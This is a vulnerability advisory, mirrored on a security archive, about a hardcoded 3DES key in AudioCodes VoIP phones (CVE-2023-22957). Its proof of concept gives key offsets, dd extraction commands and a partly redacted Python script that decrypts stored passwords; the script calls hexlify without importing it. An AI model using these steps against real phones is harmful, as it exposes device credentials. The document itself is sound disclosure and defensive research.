what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AudioCodes VoIP Phones Hardcoded Key

AudioCodes VoIP Phones Hardcoded Key
Posted Aug 16, 2023
Authored by Moritz Abrell | Site syss.de

The AudioCodes VoIP phones store sensitive information, e.g. credentials and passwords, in encrypted form in their configuration files. These encrypted values can also be automatically configured, e.g. via the "One Voice Operation Center" or other central device management solutions. Due to the use of a hardcoded cryptographic key, an attacker with access to these configuration files is able to decrypt the encrypted values and retrieve sensitive information, e.g. the device root password. Firmware versions greater than or equal to 3.4.8.M4 are affected.

tags | exploit, root
advisories | CVE-2023-22957
SHA-256 | 29414b5c1036f3966c46308f74f15451f22b582e783e487f7aa45422c6dfd70f

AudioCodes VoIP Phones Hardcoded Key

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2022-052
Product: AudioCodes VoIP Phones
Manufacturer: AudioCodes Ltd.
Affected Version(s): Firmware Versions >= 3.4.8.M4
Tested Version(s): Firmware Version 3.4.4.1000
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2022-11-11
Solution Date: N.A.
Public Disclosure: 2023-08-10
CVE Reference: CVE-2023-22957
Author of Advisory: Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

AudioCodes VoIP phones are modern desk phones which are used for the
operation in enterprise environments.

The manufacturer describes the product as follows (see [1]):

"The AudioCodes 400HD series of IP phones is a range of easy-to-use,
feature-rich desktop devices for the service provider hosted services,
enterprise IP telephony and contact center markets. Based on the same
advanced, field-proven underlying technology as our other VoIP products,
AudioCodes high quality IP phones enable systems integrators and end
customers to build end-to-end VoIP solutions."


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The AudioCodes VoIP phones store sensitive information, e.g. credentials
and passwords, in encrypted form in their configuration files.
These encrypted values can also be automatically configured, e.g. via
the "One Voice Operation Center" or other central device management solutions.

Due to the use of a hardcoded cryptographic key, an attacker with
access to these configuration files is able to decrypt the encrypted
values and retrieve sensitive information, e.g. the device root password.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By analyzing the shared library "libac_des3.so" of an AudioCodes IP phone
firmware in a disassembler and decompiler, e.g. Ghidra, the encryption
mechanism could be reversed and the hardcoded cryptographic key could be
extracted.

Used encryption algorithm: Triple DES in CBC mode
Memory address of the 24-byte 3DES key in the library: 00000fb8
Memory address of the 8-byte 3DES IV: 00000fb0

Extracting the key:
#> offset=$(python3 -c 'print(int("00000fb8", base=16))')
#> dd skip=$offset count=24 if=libac_des3.so of=key.bin bs=1

Extracting the IV:
#> offset=$(python3 -c 'print(int("00000fb0", base=16))')
#> dd skip=$offset count=8 if=libac_des3.so of=iv.bin bs=1


The following proof-of-concept Python script can be used for decryption:

import sys
import base64
from Crypto.Cipher import DES3
from binascii import unhexlify

coded_string = sys.argv[1]

ciphertext = base64.b64decode(coded_string)

print("cipher text: " + str(hexlify(ciphertext)))

cipher = DES3.new(
unhexlify('604075fb509b8269[...]'),
DES3.MODE_CBC,
iv=unhexlify('a3a47c5b[...]')
)

plaintext = cipher.decrypt(ciphertext)

print("plain text: " + str(plaintext.decode('utf-8')))


Execution of the proof-of-concept script:
#> python decrypt.py kUqyNmIT1cDyBwGTu6J1Dw==

cipher text: b'914ab2366213d5c0f2070193bba2750f'
plain text: S3cr3tP455w0rd

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update devices to firmware version 3.4.8.M4 and define an individual and
strong secret from which the encryption key is derived.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-11-03: Vulnerability discovered
2022-11-11: Vulnerability reported to manufacturer
2022-12-12: Vulnerability confirmed by AudioCodes Ltd.
2023-01-19: AudioCodes Ltd. adapts the documentation so that it no
longer states that the passwords are encrypted but obfuscated
2023-07-13: AudioCodes Ltd. informs that the upcoming release 3.4.8.M4
will include a feature that allows setting a custom password
from which the key will be derived
2023-08-10: Public disclosure at BlackHat USA[5]
2023-08-11: Public disclosure athttps://blog.syss.com[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] AudioCodes IP Phones Product Website
https://www.audiocodes.com/solutions-products/products/ip-phones
[2] AudioCodes One Voice Operation Center User's Manual
https://www.audiocodes.com/media/15928/one-voice-operations-center-users-manual-ver-80.pdf
[3] SySS Security Advisory SYSS-2022-052
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-052.txt
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
[5] BlackHat USA Briefings Session
https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341
[6] Detailed Blog Post
https://blog.syss.com/posts/zero-touch-pwn/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL:http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmS30TAACgkQrgyb+PE0
i1N8GxAApaOTpxCxcZEf1CMXW3IHbOcmK1v2gFTA/MYUMKgfFT/UG6O+GeAaEWzZ
vLkKlgxiEasllTplNr0TigNxIWIeQWTM57uIW8KeBOYMUwtYVkx0kr5NinnAjjyP
mLgn+8A9JJsqX/gr53p5Km8cyzgxNBWWHOWeS88wb/55jjOsBY/YAohEhKY7c9sM
zPj257Xij99D3hsaGYPVh1ZeaVab20h7fea5aIC1DqtEiadlgsj9MuLMVA4lCS0J
7Cv+/7KFgyujhYcy1pgQwXutSSp8hKHZGmIV2uOjm77ymVmBhX0zRG8hAX21BQBw
ExJM5fNRD17yI+6zun+7t37Fz0yTJ3YcIGC8ZECWHijkuLJG6yqowhk1Rsn2mATH
CndgGxe8qXjAPFuiZyUI+s1rfXu3iRVKaDaA0xpO/hVWFxBVqjR0awKEbU7oC5Zp
uzsun0kuhDuJ2WXeYWnSywZLXlqTPQhFTBEIapyAUiZMpoCKgDZYxCv/GeolsA1u
lfV631ryBPMZ/f6LjxDgqKGQoQCSISXjg4Bt6Ug587yhc0MMYvHequ/v5LeRpSoC
umtwSZHPdeXZC8/uhfH4K7ad62q/6BQMZyObF3gUIrwWXWUM2ow1UXN9T7Wsw0+j
n82nbE/ymMGyJvcE+cApLPlzmQuHOOdAX4EBLVDAiBQCVfIMjbM=
=uvQN
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close